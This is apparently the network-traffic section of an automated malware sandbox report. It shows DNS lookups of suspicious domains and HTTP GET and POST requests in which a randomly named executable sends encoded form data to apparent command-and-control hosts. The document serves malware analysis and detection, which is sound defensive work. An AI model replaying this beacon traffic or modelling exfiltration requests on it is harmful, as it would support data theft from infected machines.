                                                                Dec 9, 2024 08:46:39.842200041 CET6518953192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:46:40.346640110 CET53651891.1.1.1192.168.2.12

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 9, 2024 08:43:17.076107025 CET192.168.2.121.1.1.10x6e8cStandard query (0)www.holytur.netA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:43:34.239970922 CET192.168.2.121.1.1.10x9c06Standard query (0)www.nieuws-july202488.sbsA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:43:49.402509928 CET192.168.2.121.1.1.10x7dcfStandard query (0)www.losmason.shopA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:04.202589035 CET192.168.2.121.1.1.10xc32bStandard query (0)www.hayaniya.orgA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:05.210939884 CET192.168.2.121.1.1.10xc32bStandard query (0)www.hayaniya.orgA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:19.622571945 CET192.168.2.121.1.1.10xdfb1Standard query (0)www.lovel.shopA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:35.356292009 CET192.168.2.121.1.1.10x7b39Standard query (0)www.duskgazes.workA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:50.091387987 CET192.168.2.121.1.1.10xa06cStandard query (0)www.zrinorem-srumimit.sbsA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:45:43.593003035 CET192.168.2.121.1.1.10x4b3Standard query (0)www.6822662.xyzA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:45:59.746803999 CET192.168.2.121.1.1.10x8c39Standard query (0)www.lingdianyun29.xyzA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:46:24.824915886 CET192.168.2.121.1.1.10x26abStandard query (0)www.learnnow.infoA (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:46:39.842200041 CET192.168.2.121.1.1.10x6485Standard query (0)www.carpentry.clubA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 9, 2024 08:43:17.676295996 CET1.1.1.1192.168.2.120x6e8cNo error (0)www.holytur.netholytur.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 9, 2024 08:43:17.676295996 CET1.1.1.1192.168.2.120x6e8cNo error (0)holytur.net185.106.208.3A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:43:34.930557966 CET1.1.1.1192.168.2.120x9c06No error (0)www.nieuws-july202488.sbsnieuws-july202488.sbsCNAME (Canonical name)IN (0x0001)false
                                                                Dec 9, 2024 08:43:34.930557966 CET1.1.1.1192.168.2.120x9c06No error (0)nieuws-july202488.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:43:49.883111000 CET1.1.1.1192.168.2.120x7dcfNo error (0)www.losmason.shop104.18.73.116A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:05.262517929 CET1.1.1.1192.168.2.120xc32bNo error (0)www.hayaniya.orghayaniya.orgCNAME (Canonical name)IN (0x0001)false
                                                                Dec 9, 2024 08:44:05.262517929 CET1.1.1.1192.168.2.120xc32bNo error (0)hayaniya.org192.185.147.100A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:05.348798037 CET1.1.1.1192.168.2.120xc32bNo error (0)www.hayaniya.orghayaniya.orgCNAME (Canonical name)IN (0x0001)false
                                                                Dec 9, 2024 08:44:05.348798037 CET1.1.1.1192.168.2.120xc32bNo error (0)hayaniya.org192.185.147.100A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:20.097646952 CET1.1.1.1192.168.2.120xdfb1No error (0)www.lovel.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:20.097646952 CET1.1.1.1192.168.2.120xdfb1No error (0)www.lovel.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:35.793514013 CET1.1.1.1192.168.2.120x7b39No error (0)www.duskgazes.workduskgazes.workCNAME (Canonical name)IN (0x0001)false
                                                                Dec 9, 2024 08:44:35.793514013 CET1.1.1.1192.168.2.120x7b39No error (0)duskgazes.work3.33.130.190A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:35.793514013 CET1.1.1.1192.168.2.120x7b39No error (0)duskgazes.work15.197.148.33A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:50.424304962 CET1.1.1.1192.168.2.120xa06cNo error (0)www.zrinorem-srumimit.sbs104.21.38.113A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:44:50.424304962 CET1.1.1.1192.168.2.120xa06cNo error (0)www.zrinorem-srumimit.sbs172.67.222.69A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:45:44.330847979 CET1.1.1.1192.168.2.120x4b3No error (0)www.6822662.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:46:00.325237989 CET1.1.1.1192.168.2.120x8c39No error (0)www.lingdianyun29.xyz121.43.155.35A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:46:25.489885092 CET1.1.1.1192.168.2.120x26abNo error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                Dec 9, 2024 08:46:40.346640110 CET1.1.1.1192.168.2.120x6485No error (0)www.carpentry.club52.60.87.163A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.holytur.net
                                                                • www.nieuws-july202488.sbs
                                                                • www.losmason.shop
                                                                • www.hayaniya.org
                                                                • www.lovel.shop
                                                                • www.duskgazes.work
                                                                • www.zrinorem-srumimit.sbs
                                                                • www.6822662.xyz
                                                                • www.lingdianyun29.xyz
                                                                • www.learnnow.info

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1249726185.106.208.3801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:17.828968048 CET531OUTGET /cs9k/?Ebfx6=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZBVouQbNz2bSzCzmmREJaSGclyy3fj8=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.holytur.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:19.166208029 CET304INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:43:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1249729162.0.215.33801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:35.068867922 CET817OUTPOST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 75 45 52 35 56 71 34 79 71 56 53 68 37 2f 64 42 77 43 6d 70 62 35 66 64 42 6f 39 74 72 55 47 70 67 3d 3d
                                                                Data Ascii: Ebfx6=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER5Vq4yqVSh7/dBwCmpb5fdBo9trUGpg==
                                                                Dec 9, 2024 08:43:36.387365103 CET1236INHTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:36 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                Data Ascii: 135BZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                Dec 9, 2024 08:43:36.387392044 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                Dec 9, 2024 08:43:36.387403965 CET448INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                Dec 9, 2024 08:43:36.387840986 CET1236INData Raw: 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da b9 98 82
                                                                Data Ascii: fp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$ .P,-i@DU\-"c:EBrp=_
                                                                Dec 9, 2024 08:43:36.387854099 CET1076INData Raw: 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44 80 a2 05
                                                                Data Ascii: .Y*=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC*0I+s:F7H|He+sZD'0,p$dEzBtb($Uk65r{X#9ExQFgl"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1249730162.0.215.33801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:37.738359928 CET837OUTPOST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 30 49 6a 52 7a 30 50 58 6d 2b 4d 6c 6c 35 73 5a 55 52 75 41 42 62 66 36 34 46 52 50 34 61 76 56 2f 73 4f 70 72 68 2b 41 43 33 64 55 6e 47 4e 45 2b 67 68 36 61 65 6e 4d 49 76 38 64 62 6f 31 32 52 4e 66 59 45 36 6b 75 70 34 49 59 74 5a 76 6e 69 44 52 6c 31 39 67 45 67 62 79 47 63 72 32 36 45 58 51 70 48 32 75 46 48 30 4c 61 6f 4e 34 4c 52 31 73 64 57 53 54 2f 67 77 6c 31 4f 76 77 34 46 42 74 64 79 48 65 43 4b 77 38 59 74 53 51 57 52 4e 67 6f 70 50 79 6c 66 75 5a 74 54 4a 36 6f 65 54 6d 33 32 53 6a 56 4f 45 49 38 73 3d
                                                                Data Ascii: Ebfx6=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8YtSQWRNgopPylfuZtTJ6oeTm32SjVOEI8s=
                                                                Dec 9, 2024 08:43:39.011579990 CET1236INHTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:38 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                Data Ascii: 1351ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                Dec 9, 2024 08:43:39.011666059 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                Dec 9, 2024 08:43:39.011678934 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                Dec 9, 2024 08:43:39.012047052 CET672INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                Dec 9, 2024 08:43:39.022665977 CET857INData Raw: 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25 0d 76 f6 64 17 69 72 2d 04 38 d3 92 b3 5d e5 ba cc 66 bc 3f f8 70 5b 9b a4 c1 c7 f8 ae 61 75 e5 04 db 30 d5
                                                                Data Ascii: ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}'_/=;?.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1249731162.0.215.33801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:43:40.398070097 CET1850OUTPOST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 38 49 67 69 4c 30 50 32 6d 2b 4e 6c 6c 35 71 70 55 63 75 41 42 47 66 36 77 42 52 50 45 73 76 58 33 73 50 4b 6a 68 79 6c 69 33 47 45 6e 47 53 55 2b 68 6c 36 61 78 6e 4e 34 52 38 64 4c 6f 31 32 52 4e 66 62 63 36 30 50 70 34 4f 59 74 65 6f 6e 69 50 56 6c 31 46 67 45 6f 6c 79 41 41 37 32 4b 6b 58 51 4a 58 32 39 6e 2f 30 55 4b 6f 31 37 4c 52 39 73 64 62 49 54 2f 73 43 6c 33 75 4a 77 36 6c 42 75 36 66 65 4f 51 53 79 6d 34 56 67 54 57 31 70 6e 6f 46 76 31 57 65 56 66 50 6e 33 35 34 65 2f 74 32 72 33 77 6d 47 46 4b 5a 71 61 71 61 59 43 58 4c 38 39 67 50 69 52 6b 4d 58 2b 57 43 38 48 6d 76 4c 67 36 70 5a 32 66 66 71 53 72 6e 78 75 53 65 45 74 4f 73 79 31 56 34 55 64 2f 75 43 6d 79 41 7a 67 52 56 76 36 30 56 31 55 33 33 39 55 2b 61 78 74 4f 58 42 64 4a 59 55 46 56 46 4f 53 4e 74 71 57 6b 68 64 31 6a 77 49 39 6a 4a 44 33 77 58 4d 4b 6c 67 4a 53 2b 43 52 56 78 4c 63 59 [TRUNCATED]
                                                                Data Ascii: Ebfx6=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz8IgiL0P2m+Nll5qpUcuABGf6wBRPEsvX3sPKjhyli3GEnGSU+hl6axnN4R8dLo12RNfbc60Pp4OYteoniPVl1FgEolyAA72KkXQJX29n/0UKo17LR9sdbIT/sCl3uJw6lBu6feOQSym4VgTW1pnoFv1WeVfPn354e/t2r3wmGFKZqaqaYCXL89gPiRkMX+WC8HmvLg6pZ2ffqSrnxuSeEtOsy1V4Ud/uCmyAzgRVv60V1U339U+axtOXBdJYUFVFOSNtqWkhd1jwI9jJD3wXMKlgJS+CRVxLcYnQ3sHsj9oyijWcEVocXk8PTYhp+IvTK5V6Hg4g/iHKPLsBp6iuklC0S17DZtZQYkn7n8xxWwGrJusCx8mW70D0TN6HF0508GLfLv1Flfv3f9EAdMV3nkENODKXuOzOgKGK9OWHAW6y+PmL8wBM1SEQ7GcIhZXVGPA42Ib+g1+IXsakOuleAMaZSsmM6yC1e/zeibLktaE16w8Iw7berRbX9AgEfQ34VWiD0zqPGFMEDbnL19QEJwBfU3nCf6xR3xiLVgsrkYhRgL1eTU60sqAtlguQ+tDb00gsz27+BcHcq7SSuVgFVtjpQlEiSCjZoqT72tGf0Mhm0pdTsD9EQOBKeFfS7cWI+ImGQBlUh5XZlSvZQAHOpL/8M9WCIuAjBXomtBoapd7Wkww4wDIYU2AIP/jfqPLhHlD+jPS9JELdhqqZoCCOH/RJJK+pJzhgNA/0tMqmxlfJNROW0ytUmFOsuPJoWl+pMcETpHMxMO/FZCv4cLujgKf6darBN88eAUcoUoSueKkqR4PJ/mm3XX+U9tm+2jP8oTVcgnjNtfgjnq1bvWODhRlhRcDOOvkmozKrmDM+oSLW0jZQ8xSpyzI1SKK/fSSshQstDzj/Kdr4WCY/Wnius/X2v3nejttAz5vpKEOxPU4Qn0mwKEvO9ad4s5jPBg1PZgVg [TRUNCATED]
                                                                Dec 9, 2024 08:43:41.623529911 CET1236INHTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:41 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
